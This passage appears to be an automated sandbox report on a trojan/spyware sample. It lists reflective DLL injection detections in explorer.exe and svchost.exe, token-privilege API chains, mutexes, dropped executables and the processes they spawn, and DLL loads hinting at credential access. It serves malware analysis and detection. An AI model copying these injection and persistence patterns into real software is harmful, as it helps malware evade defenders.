          Source: 2.2.svchost.exe.1301d095000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.e8f0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.10d60000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.3.explorer.exe.cb95950.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.e8a0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.0.explorer.exe.f4a0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.0.explorer.exe.a020000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.cb95950.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.f4a0000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.0.explorer.exe.e8a0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.0.explorer.exe.e8a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.0.explorer.exe.e8f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.3.explorer.exe.cb95950.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.c350000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.0.explorer.exe.e8f0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.0.explorer.exe.c350000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.a020000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.0.explorer.exe.c350000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.f4a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.10d60000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.0.explorer.exe.f4a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.e8a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000002.00000002.3071197547.000001301D095000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000000.1853448227.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000000.1853992940.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000000.1850269906.000000000A020000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000000.1853413572.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 00000004.00000000.1851595360.000000000C350000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/56@0/1
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3E29E0 GetLastError,FormatMessageW,MessageBoxW,17_2_00007FF69F3E29E0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A834168 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00007FF63A834168
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A833FE8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,0_2_00007FF63A833FE8
          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF6EEF24168 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,2_2_00007FF6EEF24168
          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF6EEF23FE8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,2_2_00007FF6EEF23FE8
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F3490 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,4_2_0E8F3490
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A3490 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,4_2_0F4A3490
          Source: C:\Windows\explorer.exeCode function: 4_2_10D63490 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,4_2_10D63490
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeCode function: 5_2_00007FF7821C4168 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,5_2_00007FF7821C4168
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeCode function: 5_2_00007FF7821C3FE8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,5_2_00007FF7821C3FE8
          Source: C:\Windows\System32\audiodg.exeCode function: 7_2_00007FF6626D4168 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,7_2_00007FF6626D4168
          Source: C:\Windows\System32\audiodg.exeCode function: 7_2_00007FF6626D3FE8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,7_2_00007FF6626D3FE8
          Source: C:\Windows\System32\msiexec.exeCode function: 8_2_00007FF7F2D04168 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,8_2_00007FF7F2D04168
          Source: C:\Windows\System32\msiexec.exeCode function: 8_2_00007FF7F2D03FE8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,8_2_00007FF7F2D03FE8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A833F08 CreateToolhelp32Snapshot,Process32FirstW,wcscmp,Process32NextW,CloseHandle,0_2_00007FF63A833F08
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796Jump to behavior
          Source: C:\Windows\System32\audiodg.exeMutant created: \Sessions\1\BaseNamedObjects\worker_pPCJtqmKMc
          Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\rbNSpGEsyb
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeMutant created: NULL
          Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\ZBI
          Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\worker_VznLpbPuTg
          Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\worker_ZLpjbmHstE
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4A64.tmpJump to behavior
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exeReversingLabs: Detection: 63%
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe "C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe"
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe "C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe "C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe"
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe"
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe "C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe" Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe "C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe" Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe "C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe" Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe" Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe" Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: msvcp140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection loaded: windows.storage.dllJump to behavior
